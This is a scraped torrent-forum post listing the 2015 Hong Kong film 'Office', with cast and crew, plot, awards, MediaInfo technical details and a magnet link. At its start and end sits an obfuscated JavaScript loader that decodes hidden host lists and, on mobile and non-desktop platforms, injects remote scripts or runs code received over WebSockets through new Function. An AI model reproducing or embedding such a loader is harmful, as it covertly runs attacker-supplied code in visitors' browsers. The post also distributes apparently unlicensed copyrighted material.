华丽上班族[国语配音/中文字幕].Office.2015.1080p.WEB-DL.H264.AAC 1.31GB

版主小s 1月前 341

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 华丽上班族 / 华丽上班族之生活与生存 / Office / Design for Living

◎片 名 華麗上班族

◎年 代 2015

◎产 地 中国香港 / 中国大陆

◎类 别 剧情 / 喜剧 / 爱情 / 歌舞

◎语 言 汉语普通话 / 粤语 / 英语

◎上映日期 2015-09-02(中国大陆) / 2015-09-24(中国香港)

◎IMDb链接 https://www.imdb.com/title/tt4392726/

◎豆瓣评分 6.0/10 (52226人评价)

◎豆瓣链接 https://movie.douban.com/subject/11776289/

◎片 长 119分钟

◎导 演 杜琪峰 Johnnie To (id:1160186)

◎编 剧 张艾嘉 Sylvia Chang (id:1012646)

◎演 员 周润发 Yun-Fat Chow (id:1044899)

张艾嘉 Sylvia Chang (id:1012646)

陈奕迅 Eason Chan (id:1023424)

汤唯 Wei Tang (id:1025141)

王紫逸 Ziyi Wang (id:1317348)

郎月婷 Yueting Lang (id:1330484)

张兆辉 Siu-Fai Cheung (id:1005843)

天心 Tien Hsin (id:1043325)

车婉婉 Stephanie Che (id:1017188)

洪天明 Timmy Hung Tin-Ming (id:1314773)

朱健钧 Mickey Chu Kin-Kwan (id:1321676)

龚慈恩 Mimi Kung (id:1313657)

何奕辰 Yichen He (id:1448410)

(id:1448411)

黄芷晴 Adrian Wong (id:1392889)

董子萱 Zixuan Dong (id:1387419)

吴嘉星 Kathy Wu (id:1357327)

李志荟 Zhihui Li (id:1350905)

黃雋謙 Chun Him Wong (id:1381921)

(id:1448412)

杜琪峰 Johnnie To (id:1160186)

曾咏汶 Wing Tsang (id:1335012)

吴亚康 Yakang Wu (id:1399849)

江志强 William Kong (id:1288870)

傅若清 Ruoqing Fu (id:1417588)

刘燕铭 Yanming Liu (id:1400441)

林建岳 Peter Lam (id:1340495)

张艾嘉 Sylvia Chang (id:1012646)

龚宇 Yu Gong (id:1406734)

张昭 Zhao Zhang (id:1397618)

陈辉阳 Fai Young Chan (id:1311133)

罗大佑 Tayu Lo (id:1011384)

郑兆强 Siu-keung Cheng (id:1280597)

张叔平 William Chang (id:1274369)

邱伟明 Alfred Yau (id:1301442)

吕凤珊 Fengshan Lü (id:1370031)

吴书瑶 Shu-Yao Wu (id:1335027)

李昭桦 Charles Lee (id:1352759)

安小龙 Xiaolong An (id:1362090)

杜笃之 Du-Che Tu (id:1275159)

◎标 签 杜琪峰 / 香港 / 歌舞 / 陈奕迅 / 张艾嘉 / 汤唯 / 2015 / 周润发

◎简 介

清晨,职场菜鸟李想(王紫逸 饰)踏入众信贸易集团大楼,开始第一天工作。

公司里,想结识应聘助理的年轻女孩何琪(郎月婷 饰)。但何琪真正身份是董事长何仲平(周润发 饰)的女儿,更引起同事猜疑,幸得CEO张威(张艾嘉 饰)帮忙渡过难关。

张威忙于公司上市,却得知何仲平欲让女儿接手众信,心死之下决定为自身利益盘算,因而联手公司副总王大伟(陈奕迅 饰),实施神秘计划,想更在不知不觉间卷入其中。

就在张威逐步推动计划时,王大伟却因沉迷股权交易负债累累,被迫利用情场失意的财务总监苏菲(汤唯 饰),陷张威等人为被动。更意想不到的是,何仲平从头到尾都在掌控一切,一段职场残酷对决,即将上演……

◎获奖情况 (共13项)

第52届台北金马影展 (2015)

金马奖 最佳女主角(提名)

└──张艾嘉 (id:1012646)

金马奖 最佳改编剧本(提名)

└──张艾嘉 (id:1012646)

金马奖 最佳美术设计

金马奖 最佳造型设计(提名)

金马奖 最佳原创歌曲(提名)

金马奖 最佳音效(提名)

第35届香港电影金像奖 (2016)

最佳女主角(提名)

└──张艾嘉 (id:1012646)

最佳美术指导

最佳服装造型设计(提名)

最佳原创电影音乐

最佳音响效果(提名)

最佳视觉效果(提名)

第6届豆瓣电影鑫像奖 (2016)

鑫豆单元 最佳女演员(华语)(提名)

└──张艾嘉 (id:1012646)

  1. ##### MediaInfo ######

  2. General

  3. Complete name : 华丽上班族[email protected]

  4. Format : MPEG-4

  5. Format profile : Base Media

  6. Codec ID : isom (isom/iso2/avc1/mp41)

  7. File size : 1.31 GiB

  8. Duration : 1 h 59 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 1 574 kb/s

  11. Writing application : Lavf58.17.103


  12. Video

  13. ID : 1

  14. Format : AVC

  15. Format/Info : Advanced Video Codec

  16. Format profile : [email protected]

  17. Format settings : CABAC / 3 Ref Frames

  18. Format settings, CABAC : Yes

  19. Format settings, Reference frames : 3 frames

  20. Codec ID : avc1

  21. Codec ID/Info : Advanced Video Coding

  22. Duration : 1 h 59 min

  23. Bit rate : 1 443 kb/s

  24. Width : 1 920 pixels

  25. Height : 800 pixels

  26. Display aspect ratio : 2.40:1

  27. Frame rate mode : Constant

  28. Frame rate : 24.000 FPS

  29. Color space : YUV

  30. Chroma subsampling : 4:2:0

  31. Bit depth : 8 bits

  32. Scan type : Progressive

  33. Bits/(Pixel*Frame) : 0.039

  34. Stream size : 1.20 GiB (92%)

  35. Color range : Limited

  36. Color primaries : BT.709

  37. Transfer characteristics : BT.709

  38. Matrix coefficients : BT.709

  39. Codec configuration box : avcC


  40. Audio

  41. ID : 2

  42. Format : AAC LC

  43. Format/Info : Advanced Audio Codec Low Complexity

  44. Codec ID : mp4a-40-2

  45. Duration : 1 h 59 min

  46. Bit rate mode : Variable

  47. Bit rate : 124 kb/s

  48. Maximum bit rate : 127 kb/s

  49. Channel(s) : 2 channels

  50. Channel layout : L R

  51. Sampling rate : 44.1 kHz

  52. Frame rate : 43.066 FPS (1024 SPF)

  53. Compression mode : Lossy

  54. Stream size : 106 MiB (8%)

  55. Default : Yes

  56. Alternate group : 1




复制代码


TAGS 剧情 喜剧 爱情 歌舞

磁力链:
  • magnet:?xt=urn:btih:A91822B73737A732C226F66C6FDE599946AAC6C1

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};